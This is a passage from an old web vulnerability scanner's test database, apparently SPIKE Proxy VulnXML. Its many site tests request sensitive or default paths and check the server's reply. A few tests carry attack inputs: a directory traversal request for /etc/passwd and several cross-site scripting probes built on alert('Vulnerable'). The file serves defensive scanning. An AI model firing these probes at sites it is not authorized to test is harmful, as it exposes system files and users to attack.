HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-413.xml0100664000076500007650000000703407566204543017560 0ustar davedave (orders/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /orders/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-414.xml0100664000076500007650000000704007566204543017556 0ustar davedave (outgoing/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /outgoing/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-415.xml0100664000076500007650000000724407566204543017565 0ustar davedave (page.cgi?../../../../../../../../../../etc/passwd) "WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /page.cgi?../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-416.xml0100664000076500007650000000703207566204543017561 0ustar davedave (pages/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pages/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-417.xml0100664000076500007650000000703207566204543017562 0ustar davedave (passwd) "This could be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-418.xml0100664000076500007650000000705207566204543017565 0ustar davedave (passwd.adjunct) "This could be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /passwd.adjunct HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-419.xml0100664000076500007650000000704207566204543017565 0ustar davedave (passwd.txt) "This could be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /passwd.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-41.xml0100664000076500007650000000730107566204543017472 0ustar davedave (index.html.kr.iso2022-kr) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.kr.iso2022-kr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-420.xml0100664000076500007650000000703607566204543017560 0ustar davedave (password) "This could be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /password HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-421.xml0100664000076500007650000000705007566204543017555 0ustar davedave (passwords.txt) "This could be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /passwords.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-422.xml0100664000076500007650000000704207566204543017557 0ustar davedave (passwords/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /passwords/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-423.xml0100664000076500007650000000704007566204543017556 0ustar davedave (PDG_Cart/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /PDG_Cart/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-424.xml0100664000076500007650000000706407566204543017565 0ustar davedave (perl/) "This should probably not be browsable." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-425.xml0100664000076500007650000000703207566204543017561 0ustar davedave (perl5/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl5/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-426.xml0100664000076500007650000000702607566204543017565 0ustar davedave (php/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /php/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-427.xml0100664000076500007650000000731707566204543017571 0ustar davedave (phpimageview.php?pic=javascript:alert('Vulnerable')) "PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phpimageview.php?pic=javascript:alert('Vulnerable') HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ alert\('Vulnerable'\) 200 alert\('Vulnerable'\) 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-428.xml0100664000076500007650000000705607566204543017572 0ustar davedave (phpinfo.php) "Contains PHP configuration information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phpinfo.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-429.xml0100664000076500007650000000706007566204543017566 0ustar davedave (phpinfo.php3) "Contains PHP configuration information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phpinfo.php3 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-42.xml0100664000076500007650000000726707566204543017506 0ustar davedave (index.html.ltz.utf8) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.ltz.utf8 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-430.xml0100664000076500007650000000746307566204543017565 0ustar davedave (phptonuke.php?filnavn=<script>alert('Vulnerable')</script>) "PHPNuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-431.xml0100664000076500007650000000710207566204543017554 0ustar davedave (piranha/secure/passwd.php3) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /piranha/secure/passwd.php3 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-432.xml0100664000076500007650000000770107566204543017562 0ustar davedave (pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit) "IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-433.xml0100664000076500007650000000766607566204543017575 0ustar davedave (pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello) "WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-434.xml0100664000076500007650000000700407566204543017560 0ustar davedave (porn/) "Uh oh..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /porn/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-435.xml0100664000076500007650000000700407566204543017561 0ustar davedave (pr0n/) "Uh oh..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pr0n/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-436.xml0100664000076500007650000000703607566204543017567 0ustar davedave (private/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /private/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-437.xml0100664000076500007650000000700407566204543017563 0ustar davedave (pron/) "Uh oh..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pron/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-438.xml0100664000076500007650000000702607566204543017570 0ustar davedave (pub/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pub/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-439.xml0100664000076500007650000000703407566204543017570 0ustar davedave (public/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /public/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-43.xml0100664000076500007650000000726507566204543017505 0ustar davedave (index.html.lu.utf8) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.lu.utf8 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-440.xml0100664000076500007650000000704007566204543017555 0ustar davedave (purchase/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /purchase/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-441.xml0100664000076500007650000000704207566204543017560 0ustar davedave (purchases/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /purchases/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-442.xml0100664000076500007650000000702407566204543017561 0ustar davedave (pw/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pw/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-443.xml0100664000076500007650000000704307566204543017563 0ustar davedave (quikstore.cfg) "Shopping cart config file 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /quikstore.cfg HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-444.xml0100664000076500007650000000706307566204543017566 0ustar davedave (quikstore.cgi) "Shopping cart. It may be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /quikstore.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-445.xml0100664000076500007650000000704007566204543017562 0ustar davedave (register/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /register/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-446.xml0100664000076500007650000000704407566204543017567 0ustar davedave (registered/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /registered/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-447.xml0100664000076500007650000000751607566204543017574 0ustar davedave (replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>) "This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an 